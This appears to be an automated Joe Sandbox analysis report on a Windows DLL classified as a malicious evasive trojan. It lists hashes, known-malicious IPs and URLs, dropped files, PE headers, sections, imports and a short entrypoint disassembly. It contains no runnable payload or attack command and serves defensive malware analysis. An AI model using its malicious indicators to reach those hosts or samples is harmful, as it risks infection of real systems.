                              Start date and time: 20/07/202201:05:102022-07-20 01:05:10 +02:00
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 12m 23s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:9818t9ks1s (renamed file extension from none to dll)
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Number of analysed new started processes analysed:26
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDLL@19/5@0/58
                              EGA Information:
                              • Successful, ratio: 100%
                              HDC Information:
                              • Successful, ratio: 99.8% (good quality ratio 97.2%)
                              • Quality average: 84.5%
                              • Quality standard deviation: 23.7%
                              HCA Information:
                              • Successful, ratio: 94%
                              • Number of executed functions: 31
                              • Number of non-executed functions: 281
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Override analysis time to 240s for rundll32

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 20.106.86.13, 23.205.181.161, 13.71.55.58, 23.211.4.86, 20.223.24.244
                              • Excluded domains from analysis (whitelisted): fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, settings-prod-cin-2.centralindia.cloudapp.azure.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, fs.microsoft.com, settings-prod-wus3-1.westus3.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, atm-settingsfe-prod-weighted.trafficmanager.net, ris.api.iris.microsoft.com, licensing.mp.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              01:06:51API Interceptor11x Sleep call for process: svchost.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              217.182.25.250CUfsVUDkr6.dllGet hashmaliciousBrowse
                                psIFSn7VLi.dllGet hashmaliciousBrowse
                                  dhtylrVZ5y.dllGet hashmaliciousBrowse
                                    oAqFuoJ9ql.dllGet hashmaliciousBrowse
                                      MtsZNCJvMI.dllGet hashmaliciousBrowse
                                        ktrkyRZyaU.dllGet hashmaliciousBrowse
                                          l2sFDHB0lp.dllGet hashmaliciousBrowse
                                            h3CGwIXKW7.dllGet hashmaliciousBrowse
                                              FC6cLk6kKz.dllGet hashmaliciousBrowse
                                                ViiTOVGM74.dllGet hashmaliciousBrowse
                                                  0xnQJ1y1YE.dllGet hashmaliciousBrowse
                                                    ntn3NlNh90.dllGet hashmaliciousBrowse
                                                      8u6naZBcZi.dllGet hashmaliciousBrowse
                                                        z0zJ7pAKCQ.dllGet hashmaliciousBrowse
                                                          6eeJ2fpp8m.dllGet hashmaliciousBrowse
                                                            form.xlsmGet hashmaliciousBrowse
                                                              f5f5.dllGet hashmaliciousBrowse
                                                                4c96.dllGet hashmaliciousBrowse
                                                                  RoundSliderCtrlDemo.dllGet hashmaliciousBrowse
                                                                    RoundSliderCtrlDemo.dllGet hashmaliciousBrowse

                                                                      Domains

                                                                      No context

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      OVHFRCUfsVUDkr6.dllGet hashmaliciousBrowse
                                                                      • 51.91.76.89
                                                                      psIFSn7VLi.dllGet hashmaliciousBrowse
                                                                      • 192.99.251.50
                                                                      mtOre6QlR1.exeGet hashmaliciousBrowse
                                                                      • 51.255.34.118
                                                                      LtVtlK0cd0.exeGet hashmaliciousBrowse
                                                                      • 37.59.226.102
                                                                      VJjbjkQBMt_bin.jsGet hashmaliciousBrowse
                                                                      • 178.32.27.188
                                                                      https://awin1.com/cread.php?awinmid=12045&awinaffid=&ued=&clickref=td1_adid:TWSales&p=http%3A%2F%2Fnoxdirect.web.app%2Fkdix07xvardQ3bd0TR3wH05nZ1Get hashmaliciousBrowse
                                                                      • 139.99.6.158
                                                                      DOC104.docGet hashmaliciousBrowse
                                                                      • 54.38.217.40
                                                                      fax10545.htmGet hashmaliciousBrowse
                                                                      • 51.210.32.132
                                                                      JUSTIFICANTE DE PAGO.exeGet hashmaliciousBrowse
                                                                      • 92.222.97.132
                                                                      Adventstiden.exeGet hashmaliciousBrowse
                                                                      • 37.59.226.102
                                                                      what_is_in_a_supplier_agreement.jsGet hashmaliciousBrowse
                                                                      • 188.165.135.193
                                                                      SecuriteInfo.com.Variant.Doina.40672.15982.exeGet hashmaliciousBrowse
                                                                      • 51.210.113.204
                                                                      Kalkene174.exeGet hashmaliciousBrowse
                                                                      • 37.59.226.102
                                                                      H29Sj5e4FT.exeGet hashmaliciousBrowse
                                                                      • 94.23.190.57
                                                                      axnCDWrZKu.exeGet hashmaliciousBrowse
                                                                      • 94.23.190.57
                                                                      mM83aORZzI.exeGet hashmaliciousBrowse
                                                                      • 94.23.190.57
                                                                      http://globall.be/cli/ms.html?email=test@tset.comGet hashmaliciousBrowse
                                                                      • 213.186.33.104
                                                                      http://globall.be/cli/ms.html?email=test@test.comGet hashmaliciousBrowse
                                                                      • 213.186.33.104
                                                                      krnl_beta.exeGet hashmaliciousBrowse
                                                                      • 145.239.192.146
                                                                      BL DOCUMENT&PL.docmGet hashmaliciousBrowse
                                                                      • 158.69.236.45
                                                                      PLUSSERVER-ASN1DEpsIFSn7VLi.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      Payment1907202200110011.pdf.exeGet hashmaliciousBrowse
                                                                      • 151.106.116.144
                                                                      6RTi3seF1jGet hashmaliciousBrowse
                                                                      • 80.237.233.108
                                                                      QhZOQYbYsp.exeGet hashmaliciousBrowse
                                                                      • 31.210.20.149
                                                                      4SetC05w7w.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      lTaopQSh77.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      tcJpDrGi4S.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      5ywyY235gq.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      psegJrZqzl.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      0GFisgjwbN.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      L69zUouuZJ.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      DB9nlmI2M6.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      hpObJ0RzlP.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      hpObJ0RzlP.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      wTcqKKXreW.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      lfTOgAnXsi.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      lfTOgAnXsi.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      Q67VnQpEvO.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      Lon3WRFlnJ.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196
                                                                      vYV6X8R82v.dllGet hashmaliciousBrowse
                                                                      • 151.106.112.196

                                                                      JA3 Fingerprints

                                                                      No context

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8192
                                                                      Entropy (8bit):0.3593198815979092
                                                                      Encrypted:false
                                                                      SSDEEP:12:SnaaD0JcaaD0JwQQU2naaD0JcaaD0JwQQU:4tgJctgJw/tgJctgJw
                                                                      MD5:BF1DC7D5D8DAD7478F426DF8B3F8BAA6
                                                                      SHA1:C6B0BDE788F553F865D65F773D8F6A3546887E42
                                                                      SHA-256:BE47C764C38CA7A90A345BE183F5261E89B98743B5E35989E9A8BE0DA498C0F2
                                                                      SHA-512:00F2412AA04E09EA19A8315D80BE66D2727C713FC0F5AE6A9334BABA539817F568A98CA3A45B2673282BDD325B8B0E2840A393A4DCFADCB16473F5EAF2AF3180
                                                                      Malicious:false
                                                                      Preview:.............*..........3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................*.............................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:MPEG-4 LOAS
                                                                      Category:dropped
                                                                      Size (bytes):1310720
                                                                      Entropy (8bit):0.24943716309551126
                                                                      Encrypted:false
                                                                      SSDEEP:1536:BJiRdfVzkZm3lyf49uyc0ga04PdHS9LrM/oVMUdSRU49:BJiRdwfu2SRU49
                                                                      MD5:00654427E58616B58C62FC50C2B52CAE
                                                                      SHA1:FAE33CDA4A87AE87F8C54F629D947A73C0F3D752
                                                                      SHA-256:03367E7F1FBA65E7384C510DBEF162E503A7499F98E712C23D2A4990677EBACD
                                                                      SHA-512:50B9C51F0154E0AC12BFE61392E0295E5B70A93338AE526C115E018FE46A93596226C4B2A0BD74C2B254883E93F1CC2A7BFF900D505722DC7CB765E1B5EF9A2D
                                                                      Malicious:false
                                                                      Preview:V.d.........@..@.3...w...........................3...w..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.........................................d#.................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0x31ef495f, page size 16384, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):786432
                                                                      Entropy (8bit):0.25054036977537886
                                                                      Encrypted:false
                                                                      SSDEEP:384:7jM+W0StseCJ48EApW0StseCJ48E2rTSjlK/ebmLerYSRSY1J2:7jTSB2nSB2RSjlK/+mLesOj1J2
                                                                      MD5:F449C6D8DF10E7E1F61BDD97A6494F87
                                                                      SHA1:CE664D962FF28C7AD92580FEAB4E450998815495
                                                                      SHA-256:5928D3F1531BDD70D74FF76EEF2344721E7398CC22D3F203F09CBEDD149DE78A
                                                                      SHA-512:5B77117B0644DAB36AC90631921320E6B5978D08E4D7B852E212F6E89335E7021068E8570BF8E777941328E3B4E1511AF61F99DD07D633BB8195149C484955B9
                                                                      Malicious:false
                                                                      Preview:1.I_... ................e.f.3...w........................)..........z..3....z9.h.(..........z....)..............3...w...........................................................................................................B...........@...................................................................................................... ....................................................................................................................................................................................................................................................(.0.....z...........................z..........................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):16384
                                                                      Entropy (8bit):0.07303587911152667
                                                                      Encrypted:false
                                                                      SSDEEP:3:R4HR7vWMoximlll/tksjibD1tHlllall3Vkttlmlnl:grW/iWMwibD1tfA3
                                                                      MD5:F2E666170C5999D5002A645DC8634D6E
                                                                      SHA1:20FFA1FAF1479110694542B7972C3F5155A9BED6
                                                                      SHA-256:57FB4BC8D3FFC4201342D81B07349EA6BC5728AFB0C4213E52AC91FB781D2E1E
                                                                      SHA-512:331576024162E4BBD3517803D81CEC60A8A12D1DED59E31B50FCA8DCC2D0721EE075955591EF0116383F3188729105F45E65CE4F376610963ECDA11978181B6B
                                                                      Malicious:false
                                                                      Preview:=........................................3...w..3....z9......z...............z.......z..yM.I.....z}i.........................z..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                      Download File
                                                                      Process:C:\Windows\System32\svchost.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):55
                                                                      Entropy (8bit):4.306461250274409
                                                                      Encrypted:false
                                                                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                      Malicious:false
                                                                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                      Static File Info

                                                                      General

                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Entropy (8bit):6.352826845434315
                                                                      TrID:
                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 98.32%
                                                                      • Windows Screen Saver (13104/52) 1.29%
                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                      File name:9818t9ks1s.dll
                                                                      File size:655360
                                                                      MD5:83418a9af56db91ff2c78c4b2b9d62f8
                                                                      SHA1:0ea68aab3721e509ce0b1bff7e574eda037798be
                                                                      SHA256:4a688f571024b08f9793559427d8692471f5aa715882899c631c3052eac7c6a1
                                                                      SHA512:dadfeea6c52deda79860158036b60c54e907483b3f317e270d44e5949db169f4a26e748956654d914a3c9dda52c264e2c79bc0073254d9e58c62d9b5e69205a2
                                                                      SSDEEP:6144:/6ZMFXzqfoSHr/mvcQYbi2HN8C8BgifO7y7TcuVqrWLWN7Ypsi6Ih9vH0/oUHahE:/8MFX47ivcQMNsrD4KJjO69cI
                                                                      TLSH:06D47C0EFFD1C1B2D36B123019D5C64823ADBF2CEAA1C5B777A8BE1D69326C14512B16
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..0m..cm..cm..c...cg..c...ck..c~..co..c...c|..cm..c@..ch..cq..ch..c...cF..cd..ch..c...ch..cl..c...cl..ch..cl..cRichm..c.......

                                                                      File Icon

                                                                      Icon Hash:c0cc4c687ccccc78

                                                                      Static PE Info

                                                                      General

                                                                      Entrypoint:0x1001131c
                                                                      Entrypoint Section:.text
                                                                      Digitally signed:false
                                                                      Imagebase:0x10000000
                                                                      Subsystem:windows gui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                                                                      DLL Characteristics:
                                                                      Time Stamp:0x623CFB7E [Thu Mar 24 23:15:10 2022 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:d63ab94f4bb6b5d2f0f6092bf07e00ac

                                                                      Entrypoint Preview

                                                                      Instruction
                                                                      push 0000000Ch
                                                                      push 10041D40h
                                                                      call 00007FB05074AA61h
                                                                      xor eax, eax
                                                                      inc eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                      xor edi, edi
                                                                      cmp esi, edi
                                                                      jne 00007FB05074987Eh
                                                                      cmp dword ptr [1004F3C8h], edi
                                                                      je 00007FB050749929h
                                                                      mov dword ptr [ebp-04h], edi
                                                                      cmp esi, eax
                                                                      je 00007FB050749877h
                                                                      cmp esi, 02h
                                                                      jne 00007FB0507498A3h
                                                                      mov eax, dword ptr [10050CB4h]
                                                                      cmp eax, edi
                                                                      je 00007FB05074987Eh
                                                                      push dword ptr [ebp+10h]
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp dword ptr [ebp-1Ch], edi
                                                                      je 00007FB0507498FBh
                                                                      push dword ptr [ebp+10h]
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB050749697h
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp eax, edi
                                                                      je 00007FB0507498E4h
                                                                      mov ebx, dword ptr [ebp+10h]
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05073E608h
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      cmp esi, 01h
                                                                      jne 00007FB050749880h
                                                                      cmp eax, edi
                                                                      jne 00007FB05074987Ch
                                                                      push ebx
                                                                      push edi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05074966Dh
                                                                      cmp esi, edi
                                                                      je 00007FB050749877h
                                                                      cmp esi, 03h
                                                                      jne 00007FB05074989Bh
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call 00007FB05074965Ah
                                                                      test eax, eax
                                                                      jne 00007FB050749875h
                                                                      mov dword ptr [ebp-1Ch], edi
                                                                      cmp dword ptr [ebp-1Ch], edi
                                                                      je 00007FB050749885h
                                                                      mov eax, dword ptr [10050CB4h]
                                                                      cmp eax, edi
                                                                      je 00007FB05074987Ch
                                                                      push ebx
                                                                      push esi
                                                                      push dword ptr [ebp+08h]
                                                                      call eax
                                                                      mov dword ptr [ebp-1Ch], eax
                                                                      or dword ptr [ebp-04h], FFFFFFFFh
                                                                      mov eax, dword ptr [ebp-1Ch]
                                                                      jmp 00007FB05074988Ch
                                                                      mov eax, dword ptr [ebp-14h]
                                                                      mov ecx, dword ptr [eax]

                                                                      Rich Headers

                                                                      Programming Language:
                                                                      • [ASM] VS2003 (.NET) build 3077
                                                                      • [ C ] VS2003 (.NET) build 3077
                                                                      • [C++] VS2003 (.NET) build 3077
                                                                      • [EXP] VS2003 (.NET) build 3077
                                                                      • [RES] VS2003 (.NET) build 3077
                                                                      • [LNK] VS2003 (.NET) build 3077

                                                                      Data Directories

                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x4aa400x6e.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x488440x104.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x480a0.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x9a0000x4e40.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x438300x48.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x3c0000x668.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x487bc0x40.rdata
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                      Sections

                                                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      .text0x10000x3a49e0x3b000False0.6009418034957628data6.6116392367886405IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rdata0x3c0000xeaae0xf000False0.32220052083333334data5.046533656475497IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .data0x4b0000x5cb80x3000False0.2513834635416667data3.8346109495878085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .rsrc0x510000x480a00x49000False0.5524534460616438data6.0777904674160155IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0x9a0000x88100x9000False0.3506673177083333data4.48951519417909IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                      Resources

                                                                      NameRVASizeTypeLanguageCountry
                                                                      0x747c00x20800data
                                                                      RT_CURSOR0x950280x134data
                                                                      RT_CURSOR0x951600xb4data
                                                                      RT_CURSOR0x952400x134AmigaOS bitmap font
                                                                      RT_CURSOR0x953900x134data
                                                                      RT_CURSOR0x954e00x134data
                                                                      RT_CURSOR0x956300x134data
                                                                      RT_CURSOR0x957800x134data
                                                                      RT_CURSOR0x958d00x134data
                                                                      RT_CURSOR0x95a200x134data
                                                                      RT_CURSOR0x95b700x134data
                                                                      RT_CURSOR0x95cc00x134data
                                                                      RT_CURSOR0x95e100x134data
                                                                      RT_CURSOR0x95f600x134AmigaOS bitmap font
                                                                      RT_CURSOR0x960b00x134data
                                                                      RT_CURSOR0x962000x134data
                                                                      RT_CURSOR0x963500x134data
                                                                      RT_BITMAP0x522e00x428data
                                                                      RT_BITMAP0x520c00xe0GLS_BINARY_LSB_FIRSTSpanishMexico
                                                                      RT_BITMAP0x965a00xb8data
                                                                      RT_BITMAP0x966580x144data
                                                                      RT_ICON0x52a980x10828dBase III DBT, version number 0, next free block index 40
                                                                      RT_ICON0x632d80x10828dBase III DBT, version number 0, next free block index 40
                                                                      RT_ICON0x73b180x2e8data
                                                                      RT_ICON0x73e000x128GLS_BINARY_LSB_FIRST
                                                                      RT_ICON0x73f500x2e8data
                                                                      RT_ICON0x742380x128GLS_BINARY_LSB_FIRST
                                                                      RT_ICON0x743880x2e8data
                                                                      RT_ICON0x746700x128GLS_BINARY_LSB_FIRST
                                                                      RT_MENU0x527280x23adata
                                                                      RT_MENU0x521b00x46dataSpanishMexico
                                                                      RT_DIALOG0x529680x12cdata
                                                                      RT_DIALOG0x521f80xe2dataSpanishMexico
                                                                      RT_DIALOG0x964a00xfedata
                                                                      RT_STRING0x968100x92data
                                                                      RT_STRING0x967a00x6adataSpanishMexico
                                                                      RT_STRING0x968a80x48data
                                                                      RT_STRING0x969380x19edata
                                                                      RT_STRING0x96c080x280data
                                                                      RT_STRING0x970100x39cdata
                                                                      RT_STRING0x96f900x7adata
                                                                      RT_STRING0x96ad80x12edata
                                                                      RT_STRING0x96e880x104data
                                                                      RT_STRING0x968f00x46data
                                                                      RT_STRING0x973b00x128data
                                                                      RT_STRING0x974d80x240data
                                                                      RT_STRING0x977180x9edata
                                                                      RT_STRING0x977b80xb0Hitachi SH big-endian COFF object file, not stripped, 16640 sections, symbol offset=0x69007200, 201344768 symbols, optional header size 29952
                                                                      RT_STRING0x978680x30data
                                                                      RT_STRING0x978980x1d0data
                                                                      RT_STRING0x97a680x5bcdata
                                                                      RT_STRING0x984180x31cdata
                                                                      RT_STRING0x981180x300data
                                                                      RT_STRING0x98fa00xb0data
                                                                      RT_STRING0x980280xeedata
                                                                      RT_STRING0x98e500x11edata
                                                                      RT_STRING0x987380x4d0data
                                                                      RT_STRING0x98c080x248data
                                                                      RT_STRING0x98f700x2edata
                                                                      RT_STRING0x990500x4cdata
                                                                      RT_ACCELERATOR0x94fc00x68data
                                                                      RT_GROUP_CURSOR0x952180x22Lotus unknown worksheet or configuration, revision 0x2
                                                                      RT_GROUP_CURSOR0x95a080x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x953780x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x958b80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x957680x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x960980x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x956180x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x95ca80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x954c80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x95b580x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x95df80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x95f480x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x961e80x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x963380x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_CURSOR0x964880x14Lotus unknown worksheet or configuration, revision 0x1
                                                                      RT_GROUP_ICON0x632c00x14data
                                                                      RT_GROUP_ICON0x73f280x22data
                                                                      RT_GROUP_ICON0x73b000x14data
                                                                      RT_GROUP_ICON0x743600x22data
                                                                      RT_GROUP_ICON0x747980x22data
                                                                      None0x527080x1edata
                                                                      None0x521a00xadataSpanishMexico

                                                                      Imports

                                                                      DLLImport
                                                                      KERNEL32.dllRtlUnwind, GetSystemTimeAsFileTime, GetCommandLineA, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, VirtualQuery, QueryPerformanceCounter, GetCurrentProcessId, SetUnhandledExceptionFilter, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapFree, HeapAlloc, GetTickCount, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, GetShortPathNameA, CreateFileA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetCurrentDirectoryA, GlobalFlags, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, CloseHandle, GlobalAddAtomA, GetCurrentThread, GetCurrentThreadId, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, FreeResource, SetLastError, GlobalFree, FindResourceA, LoadResource, LockResource, SizeofResource, MulDiv, GlobalAlloc, GlobalLock, GlobalUnlock, FormatMessageA, lstrcpynA, LocalFree, ExitProcess, GetStringTypeExA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, UnhandledExceptionFilter, InterlockedExchange
